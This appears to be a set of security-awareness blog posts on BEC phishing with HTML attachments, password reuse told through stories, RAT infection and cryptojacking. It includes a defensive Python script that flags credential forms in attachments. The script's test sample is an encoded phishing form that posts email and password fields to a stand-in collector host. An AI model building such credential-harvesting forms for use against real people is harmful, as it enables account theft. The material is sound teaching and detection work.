Hacking Email Accounts for BEC

Yep, Business Email Compromise (BEC) is a thing. (If you don’t believe me, read this, this and this.) There’s also an ugly step-sister of BEC that some people are calling Vendor Email Compromise (VEC).

Whatever you call it, a key step in these schemes usually involves an attacker gaining access to someone’s email account, whether it is the victim’s, their vendor’s or their client’s. Why? Well, the attacker wants to understand things like how the money flows in the targeted company, who is responsible for making payments and what the prerequisites are for someone in that company to act on payment instructions. Remember, they are trying to trick their target into thinking that they are communicating with a legitimate someone. The end goal is usually to get a victim to act on a fraudulent payment instruction or to change an existing vendor’s or client’s bank account to a new fraudulent account number. Not the most technical hacking ever, but these guys are patient, persistent and effective.

So, before the BEC scam gets into full swing, the attacker needs to get access to (hack) their target’s email account. How do they do this? Well, the answer is “it varies” (like with most things in Infosec).

Often times it will start with something like either a bulk or targeted phishing campaign. One example is where an attacker will send an email posing as a supplier with an urgent outstanding invoice, something that will get the average person’s attention. Now, let’s pause for a moment. Before you roll your eyes and mutter ‘you can’t patch stupid!’… humor me for a bit with a story from Hypothetical Jack:

Story Time

It’s just after 14:00 on Monday afternoon. The long weekend from which hypothetical Jack and his family returned on Sunday evening remains a distant memory. Bogged down in his 2×2 cubicle, Jack reminisces about the Certified-Karoo-free-range lamb chops they braaied on Saturday evening under a clear sky. He can still hear the distant howling of a black-backed jackal echoing through the Waterberg mountains, each time the clacking sound of his fingers pounding away at his laptop’s keyboard subsides for a brief moment. Strangely enough, this time the howling seems to get louder, almost like the jackal is stalking his cubicle…. “Jack! Snap out of it!” and like that the harsh voice of his colleague Gertrude abruptly rips him out of his daydream and smacks him down on his high-back orthopedic office chair. “Peter is waiting for your monthly financial report card. He wants it before 4 today. It’s month end, remember…”

Jack reluctantly realigns his grey matter back to the humdrum of checking multiple spreadsheets and adding meaningless Gantt charts to an even more meaningless PowerPoint month-end presentation. Flipping between sheets, his eye catches the Outlook pop-up notification appearing from the right bottom of his screen. He was able to make out something about an outstanding invoice due this week before it disappeared again behind his litter of open spreadsheets.

Jack’s squirrel instinct takes over as he conveniently forgets about his looming month-end deadline and clicks over to Outlook to find the following email:

Jack has never dealt with “New Real Supplies CC” before and concludes that this is likely a new vendor they are dealing with. As he stares at the attachment, he remembers the one thing they taught him in his Information Security Awareness training session: DON’T CLICK LINKS.

“Well, I’ve got 99 problems but the link ain’t one” Jack mumbles as he opens the Payment Invoice.html attachment promising a 25% discount for early payment.

We’ll pause the story here for now. The point is that in a high-stress-multi-tasking-deadline-driven-environment, it doesn’t take much to lure Hypothetical Jack into opening an attachment from an unknown source.

Dodgy HTML Attachments

Let’s look at two real world examples of how attackers use HTML attachments to trick users into revealing their email account credentials. Remember, Jack is expecting to see some sort of invoice as indicated in the email message…

Attachment one: The Blurred Invoice

Have a closer look. The attackers did a great job with this one. Once the attachment is opened in a user’s browser, it shows a blurry ‘invoice’ document in the background. All that now stands between Jack and the un-blurred ‘invoice’, is this box asking for his email address and password:

Let’s have a look what happens when you enter your details in the form and click the “View Document” button.

To do this, we’ll look at the source code of the Payment Invoice.html attachment. Firstly, this shows a poor attempt at hiding the actual code with a <!-- Source code not available ... --> comment at the top of the page:

Scrolling down, you eventually get to the real, but quite hectically obfuscated source code:

Now, you can do either one of two things at this stage:

  1. Spend your Friday afternoon attempting to make sense of the obfuscation OR
  2. Open the attachment in a controlled environment, run something like Fiddler to capture HTTP traffic while you enter an email address and password in the form and hit “View Document”.

Naturally, I opted for Option 2 which gave us the following output in Fiddler:

From the above you can see that whatever the user enters into the “Email ID” and “Email Password” fields gets shipped off to the attacker’s URL. They now have a username and password to log into the victim’s email account.

Attachment 2: PDF File Inside

This one is all nice and official looking, even with a fake McAfee “Secured Page” badge. Again it is asking the user to enter their email address and password to access the document.

Having a look at the source code of the above gives the following obfuscated code:

This time it’s fairly easy to de-obfuscate the code. The above is hexadecimal-encoded, so an easy way to decode it is to pop it into CyberChef. One of CyberChef’s myriad functions is decoding hex to ASCII. Adding the above to the ‘Input’ box in CyberChef and selecting the hex decode recipe gives you the following (note the Output box):

Scrolling through the decoded source code of the attachment brings us to the following section:

Here we again see that all this page does is capture what the user entered in the form (i.e. email username and password) and ship that off to the attacker’s URL. No actual invoice for the victim to view, while the attackers are helping themselves to an email inbox using the newly acquired username and password.
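The triage both attachments call for (peel off the hex layer, then find where the credential form posts) can be scripted for a mail gateway or an analyst's workstation. This is an added example, not code from the original post: it assumes the hex layer is `%XX`, `\xXX` or bare hex digits, and the sample attachment, its field names and the `collector.example.invalid` host are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse


def printable_hex(hex_digits):
    """Decode a run of hex digits; return None unless it is printable ASCII (skips hashes)."""
    raw = bytes.fromhex(hex_digits)
    if all(b in (9, 10, 13) or 32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


# (pattern, decoder) pairs for the hex-style encodings handled here (assumed forms).
DECODERS = [
    (re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}"), lambda s: unquote(s, errors="replace")),
    (re.compile(r"(?:\\x[0-9A-Fa-f]{2}){8,}"), lambda s: printable_hex(s.replace("\\x", ""))),
    (re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){16,}(?![0-9A-Fa-f])"), printable_hex),
]


def decoded_fragments(text, max_depth=3):
    """Return the original text followed by every decoded fragment, following nested layers."""
    found, queue = [text], [(text, 0)]
    while queue:
        current, depth = queue.pop()
        if depth >= max_depth:
            continue
        for pattern, decoder in DECODERS:
            for match in pattern.finditer(current):
                fragment = decoder(match.group(0))
                if fragment and fragment != match.group(0):
                    found.append(fragment)
                    queue.append((fragment, depth + 1))
    return found


class FormFinder(HTMLParser):
    """Collect each <form> with its action URL and the names of its password inputs."""

    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "password_fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password_fields"].append(attrs.get("name") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage_attachment(html_text):
    """Report password forms in a local HTML attachment that post to a remote host."""
    findings = []
    # Each fragment is parsed on its own: markup hidden inside <script> is not seen as tags.
    for index, fragment in enumerate(decoded_fragments(html_text)):
        finder = FormFinder()
        finder.feed(fragment)
        finder.close()
        for form in finder.forms:
            host = urlparse(form["action"]).hostname
            if form["password_fields"] and host:
                findings.append({"post_host": host, "action": form["action"],
                                 "password_fields": form["password_fields"],
                                 "was_encoded": index > 0})
    return findings


# Constructed sample: a credential form hidden behind unescape(), as a stand-in attachment.
SAMPLE_FORM = ('<form action="https://collector.example.invalid/next.php" method="post">'
               '<input type="text" name="email"><input type="password" name="pass">'
               '<input type="submit" value="View Document"></form>')
SAMPLE_ATTACHMENT = ('<html><body><script>document.write(unescape("'
                     + "".join("%%%02X" % b for b in SAMPLE_FORM.encode())
                     + '"));</script></body></html>')

if __name__ == "__main__":
    for finding in triage_attachment(SAMPLE_ATTACHMENT):
        print(finding)
```

A password field that posts from a local file to a remote host is the signal worth alerting on; the reported host can then be blocked and searched for in proxy logs.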

Final Thoughts

Attackers will continue coming up with innovative ways to target users. As seen in these examples, they are luring users into entering their email credentials in order to get access to an ‘urgent invoice’.

Here are 2 ways that could assist in mitigating these types of attacks:

  1. Secure your email. One step that can go a long way is to enable 2FA / MFA (Multiple forms of authentication). This will assist in preventing an attacker from logging into an email account, even though they were able to obtain the username and password of the account. They’ll still need an additional form of authentication (such as a uniquely generated code sent to a trusted device) to be able to log in.
  2. Review your payment processes. Put extra validation processes in place to ensure payment instructions received via email are actually coming from who they say they are coming from. The following scenarios are often used by attackers:
    • A request is sent to a company to change banking details for an “existing” client. Attackers attempt to get them to pay a legitimate invoice into a fraudulent bank account.
    • An urgent payment needs to be made to a new account. Attackers attempt to impersonate a supplier or even the company’s CFO, requesting his staff to urgently act on a fraudulent payment instruction.

Security Awareness – One Password To Rule ‘em All

This is part 2 of our look into the life of Frik and his daughter Marietjie. (Catch part 1 here)

During August 2018, Frik’s plumbing business went through a bit of a slump. Business was slow, the clients he had were increasingly difficult and drains didn’t clog as they used to.

In order to unclog Frik’s business (pardon the pun) Marietjie had an idea: “Why not up your social media presence?”

At this stage, Marietjie was the family social media expert: Dishing out advice on creating WhatsApp stories, doing live video streaming via Facebook and even helping Gran with applying Snapchat stickers. Frik decided to give it a shot, after all, nothing to lose, right? Facebook, Instagram, Snapchat, WhatsApp, Youtube, you name it and Plumber Frik had a profile. Marietjie also convinced him to change his online profiles from ‘Plumber Frik’ to ‘Plombier Frik’.

“It will appeal to a more sophisticated clientele” she said.

Pretty soon Plombier Frik was the most followed plumber on Social Media in all of the East Rand. Doing live Facebook broadcasts while unclogging shower traps, creating how-to videos on setting your geyser thermostat and Instagramming before and after photos when replacing burst galvanized pipes. However, keeping track of all his social media profiles was a bit of a mission. Luckily, he had developed a nifty approach…

One password to rule them all, One password to find them, One password to bring them all, and in the darkness bind them.

Ok, to be honest, Frik has only watched the first half of the first LOTR movie (never mind having read the books). So this quote is a bit out of place for Frik, but please, humor me:

One fateful evening, Frik went through his list of social media accounts. One by one he changed each password to GeeVirFriknDruk007. (The equivalent of “Give Frik a Hug 007” for our English speaking listeners). Each account Frik changed was like a step closer to Mordor. The password started to burn him, he just had to use it again. And again. And again. By 1:30am that evening, Frik had changed everything, including his Gmail account password to GeeVirFriknDruk007.


“Lekker man, lekker” Frik said to himself.

As Frik’s social media following increased, so did the fan mail. Ladies from Prieska to Pretoria were sending him email, asking about his thick Afrikaans accent, where he grew up, what size wrench was his favorite and every now and again the odd question about re-enamelling old baths.

The fan mail started to take up a lot of Frik’s free time, but he wasn’t going to disappoint his newly acquired fan base. He still remembers the rejection he felt as a young man in 1996 when Neil Tovey didn’t respond to the letter he wrote him after Bafana Bafana’s African Cup of Nations victory. No, he’ll respond to each and every email. After a while, Frik established a nice rhythm. Monday to Thursday nights after dinner, he’ll settle into his favourite lazy chair in the living room, put on some sweet tunes from Albert Frost and respond.

Late one evening, just as Frik was wrapping up his last few fan mail responses, he received an email:

“Dear Frik,

We are importers of only the highest quality copper pipe bends.

For your perusal, we’ve attached our latest price list to this email.

Looking forward to doing business with you.

Kind regards,

Mr G Ollum.”

“Ah, this should be interesting.” Frik thought to himself. “I wonder if they’ll beat the prices of Frodo’s Plumbing Supplies around the corner?”

The email had a single attachment: ‘Price List.html’

Clicking on the attachment opened Internet Explorer. Next loaded a Google Docs page.

“Marietjie!” Frik yelled.

“Ja dad, what’s wrong?” she replied.

“What’s Google Docs?”

“It’s a thing from Google where you can create and edit documents in the cloud. Why?”

“A supplier sent me a price list on Google Docs. Is it safe?”

“Yes, don’t worry.”

“Ok, it’s asking me to log in or register.”

“Just use your Gmail account to log in”

After Frik enters his Gmail username and password, the page seems to load, but only comes back to a Gmail login page.

Frik tries again, this time the page loads and redirects back to Google.

“Marietjie, it’s not working!”

“Ok dad, can I check tomorrow?”

“Ja, ok” Frik closes his laptop and stands up from his lazy chair. As the closing theme of tonight’s NCIS: Los Angeles episode plays in the background, he meanders off to bed.

The next morning, just before the crack of dawn, a strange thing started to happen. While Frik was happily snoring away, his social media accounts underwent an evolution of sorts.

Instead of being all about plumbing, they were now showing pictures advertising Ray Ban sunglasses at 90% discount!


“Amazing!” Frik thought to himself later in the day as he stared at a pair of Ray Ban Aviators for only R199 shown on his Instagram page. There was one issue however, Frik could not log in to any of his accounts anymore. Nothing wanted to work: Facebook, Instagram, Pinterest and Twitter. That’s odd, he thought. Alas, let’s reset the passwords for the lot.

As he went through the “Forgot my Password” option on each website, he waited with great anticipation for the familiar “ding” his phone makes when a new email arrives. However, this time Frik was only met with deafening silence. As he opened his Gmail app on his phone, he was greeted with a login screen. “Odd” he thought. Entering his username and password however changed “Odd” to “Oh no”. He now could not log into his email either.

What happened?

Frik got Phished. Properly phished. The email that he thought he received from a supplier was in fact a phishing email. An email from an attacker pretending to be a supplier. This message was specially crafted to convince Frik to open the attached Price List.html file. Once opened, it loaded a fake Google Docs page instead of an actual price list. Again, this was just a ruse to trick him into entering his Google username and password. Once entered, his username and password were sent to the attacker without him realising.

Following a careful study of his email communications by the attacker, they were able to get access to his social media accounts. “How?” You might ask. Well, in this case they only had to use his email address and password, of course! Frik had the same username and password for each account. Basically the same key for every lock he had. As such, stealing one key provided access to all the locks.


Enter Two Factor Authentication (2FA)

Phishing is a problem, yes. However, two factor authentication (2FA) may have prevented this. 2FA is the tech that uses two ways of authenticating you when you sign on. Typically, this translates to you using a username and password combination to log in, as well as entering an additional passcode sent to your mobile phone.

Had this been enabled, the attacker wouldn’t have had the ability to log in to any of Frik’s accounts, even though they had his user name and password. This is because the 2FA passcodes would have been sent to his mobile phone, leaving the attacker high and dry.

“But how do I enable this magic?” I hear you ask. Below is a list of common platforms with their how-to guides on enabling 2FA:

And lastly, password reuse is bad. Don’t do it, just don’t. Use a password manager that allows you to securely store passwords for your accounts. This will enable you to generate secure, unique passwords for each place you log on. A good free one you can have a look at is LastPass.

Security Awareness – Meet Frik and Marietjie.

October is National Cyber Security Awareness Month (NCSAM). Although NCSAM is a United States initiative promoting Cyber Security Awareness during the month of October, the rest of the world usually jumps on the bandwagon as well. So, it’s becoming more like International Cyber Security Awareness Month.

During the month of October, large volumes of (usually) very valuable information are published regarding information security awareness. This month, I shall join the fray with a couple of stories promoting Security Awareness. Let’s go.


Frik and Marietjie:

Meet Frik. Or rather, allow me to be more descriptive, meet Frik the plumber. Frik is your typical East Rand plumber. A good guy at heart, not too fond of technology, unless you’re referring to Showmax (but he’s starting to adapt). In the last couple of years, Frik’s business has grown tremendously and he has had to enlist the services of his eldest daughter, Marietjie, to assist with the admin side of things. Frik is able to do miracles with copper pipe, a shifting spanner and some soldering wire, but generating invoices and keeping track of payments isn’t his strong suit. This brings us to Marietjie, who has always been the tech savvy one in the family. Some of her friends would call her a tech guru, due to her being one of a select few in their close circle with the ability to type with two hands. She uses a newly bought desktop to generate invoices, pay Frik’s suppliers and verify electronic payments made by his clients.

Marietjie is however easily distracted, disappearing down Instagram rabbit holes for hours at a time. When it’s not Instagram, she keeps up with happenings on Facebook, Twitter & News24. Don’t forget the daily musings of her personal diary on Evernote. This is all done from her Android phone.

At this stage, everyone is probably asking: Marietjie, did you install an antivirus application on the desktop?

Answer: “Oh cool, a new season of Grey’s Anatomy. Still can’t believe they let McDreamy die… Oh, you asked about antivirus. Yes of course, the thing came pre-installed with some antivirus thing. Don’t worry.”

Every now and again, Marietjie skims by an article on Twitter about some sort of hacker thing. “Hackers gonna hack” she ponders as she scrolls away. On Tuesday, midway between one of her regular afternoon Showmax binges, an email notification pops up on the desktop. With one eye on the computer screen and the other on the latest episode of Grey’s, she swiftly deduces it’s some supplier sending an invoice.

“A new invoice has been generated, please click <<here>> to view.” the email reads.

Click goes the mouse.

Marietjie pauses abruptly. “What just happened? What’s going on?? Meredith just said the patient’s tumor is inoperable, and now the red head army ginger guy is pushing him to the theater for emergency life saving surgery?”

Meanwhile on the computer: “Error 500 – The page you are looking for cannot be displayed”.

That’s odd she thinks, I thought Meredith knew how to interpret brain scans? How could she make such a mistake?

F5 (refresh), still the invoice isn’t loading. She taps F5 a couple more times. “Well, if they really want us to pay, they need to sort out their system. Anyway, I’ll deal with it later.” Whilst Marietjie starts to meaninglessly scroll through Pinterest posts about dog blanket ideas for her new Yorkshire Terrier puppy, the desktop’s processor begins churning away.

The ‘broken’ link she so ferociously clicked on in the email wasn’t broken. It was purposely showing her a fake error message, whilst in the background executing a browser exploit. Basically this malicious link she clicked, unknown to her, led to all sorts of nasty files being downloaded and executed on the system. This desktop Marietjie is using for invoicing, online banking and email communication with Frik’s clients, is now infected with a Remote Access Trojan, a RAT. As a new episode of Grey’s starts, the RAT begins to secretly communicate back to its master via the internet. This includes daily updates of what Marietjie is doing on the computer, where she logs in and who she emails. It even takes screenshots of those Google searches for “does Yorkshire Terriers like perfume?” and “why did they call him Mc Dreamy?”.

But wait. Remember earlier when we asked Marietjie about antivirus and she so confidently replied between Mc Dreamy comments that it came with the computer? Taking a closer look reveals that there was indeed an antivirus application which came preinstalled with the desktop. What our dear Marietjie failed to notice was, that this was only a 30-day trial. After the initial 30 days passed, the protection stopped working. In essence, her antivirus last protected the desktop while Mc Dreamy was still alive and in love with Meredith.

This brief look into Marietjie’s life highlighted two important concepts:

  1. Be careful of what you click on. Bad guys make use of email messages to trick you into compromising your security. This can be in the form of an attachment, which masquerades itself as a document but in actual fact is packed full of bad things. Another method, as in Marietjie’s case, is a link included in an email message which when clicked, goes to a bad website to download more bad stuff to your computer. There are a lot more sly tricks attackers may use to compromise your system, but these examples will do for now.
  2. Install and check up on your antivirus application. Remember: “if it ain’t running it ain’t protectin’”. You get the point. It also needs to be regularly updated. Using an outdated antivirus is like a police officer looking for criminals in 2018, with a Most Wanted list from 1980.

#Cryptojacking – A ‘Not Too Technical’ Story


Bitcoin, blockchain, bitcoin mining, mining bitcoin on the blockchain, using the blockchain to mine bitcoin in order to buy Ethereum so that you can in turn buy stuff on the dark web. Yeah, that doesn’t make a lot of sense. Now, add another word to the already confusing list of cryptocurrency terms: #Cryptojacking.

Side note: The term Cryptojacking is not to be confused with malware families like CryptoShuffler or ComboJack. These are geared towards stealing actual bitcoin.

Cryptojacking however is when a victim’s computing resources are hijacked and used to mine cryptocurrency. On a basic level, this means that the targeted computer’s processor and GPU are used by an attacker to process the complex algorithms as part of cryptocurrency transactions. The resulting reward (coins) from the mining is then received by the attacker.

Currently, there are two flavours of Cryptojacking:

  1. Via the browser. When a user visits a website that has a cryptomining script enabled, the processing power available from the user’s computer is used, via the browser, to mine cryptocurrency. Mining scripts are often added to compromised websites where mining takes place without a user’s knowledge or consent. The malicious mining ceases once the browser tab for the infected website is closed.
  2. Via malware infections. Cryptojacking malware running on an infected computer will allow for continuous mining. An example of this is the Powerghost miner.

Cryptojacking is in essence the digital equivalent of someone breaking into your tool shed at night and, instead of stealing your stuff, they use your tools:

Creating amazing wood furniture, those projects you see on Pinterest where a guy with a leather tool belt takes old wood pallets and creates the most amazing chest of drawers within 22minutes, flat.

Is Cryptojacking an issue that deserves priority?

This is a legitimate question, seeing that ‘no one is getting hurt’.

Let’s continue with our tool shed analogy: You now suspect that someone is making use of your tools at night. Do you interrupt your hard earned sleep and hold a stake out to catch the bugger? Or should you rather focus on the real criminals that might actually steal your stuff?

Although our miscreant is bringing along his own upcycled pallets, he is still using your machinery. Say he does it once or twice a month, that ain’t bad you think. But, unfortunately, he does not have the woodworking finesse of Nick Offerman, and for all you know, he’s doing it every night. Using your electricity, breaking your drill bits, leaving the wood glue bottle open and not to mention the wear and tear of your machinery. Some nights he even lets your mitre saw run for 8 hours straight, allowing it to overheat and damage the motor.

This guy is now pretty much spending 12 hours a night, 7 nights a week in your tool shed, which also gives him time to look around the yard. One night during a smoke break, he sees that kitchen window with the broken latch you’ve been meaning to fix for the last 4 Saturdays. Miscreant ponders to himself: “A cup of coffee would sure be nice…”

As you wake up the next morning, you realise that our miscreant was in your kitchen and used your last batch of Legado Guatemalan Finca El Rincon single origin coffee beans to create the smoothest of cappuccinos in your newly Italian imported Rocket Espresso machine.

As you sip on a stale cup of instant coffee (which you think to yourself tastes more like a cardboard box than pure exhilarating caffeine), you decide that this was the last straw… It is time for action. That afternoon, you swing by the local hardware store and buy a new window latch and a proper hardened steel padlock for the shed. “That’ll keep ‘em out” you think to yourself as you lock the shed and smile at the newly fixed kitchen window latch.

The next morning, as you awake from a restful sleep, you stroll down to the kitchen, already planning an amazing breakfast for the missus (eggs benedict with a chili hollandaise sauce and streaky bacon).

“This is going to be the best…. WORST BREAKFAST EVER!!”.

It’s gone. Everything is gone. Your fridge with the eggs and streaky bacon, gone. Your vegetable rack with the fresh chilies, gone. Your Rocket Espresso machine… GONE. As the horror of what could only have happened during the night dawns upon you, your eye catches a glimpse of the open patch of lawn where your tool shed once stood. FREAKIN GONE. How the dangit did someone steal a tool shed and MY ENTIRE KITCHEN?

During the next few hours as policemen walk up and down the yard looking for clues, it dawns upon you. The woodworking miscreant had other skills as well. He wasn’t only a Pinterest level craftsman, but also a master thief (he was able to carry away your entire kitchen without you waking up), a pretty decent truck driver (reversing a flatbed truck down your driveway and lifting your tool shed takes some work) and a meticulous planner. During the past week of night time craftsmanship, the miscreant cloned your house keys and your gate remotes. This allowed him to open the front gate with a remote, reverse the truck in and unlock the kitchen door after loading the shed.

Fairly dramatic, yes, but the take home remains:

Cryptojackers aren’t just a nuisance. In the recent case of the Rakhni Miner, upon successful infection, the malware makes the decision if it wants to encrypt your data (Ransomware) or if it is going to use your resources to mine cryptocurrency.

If there are Cryptojackers running around in your environment, it should be a red flag that there are some definite weaknesses that need to be addressed within your environment.


For further reading on cryptojacking, have a look at the following articles: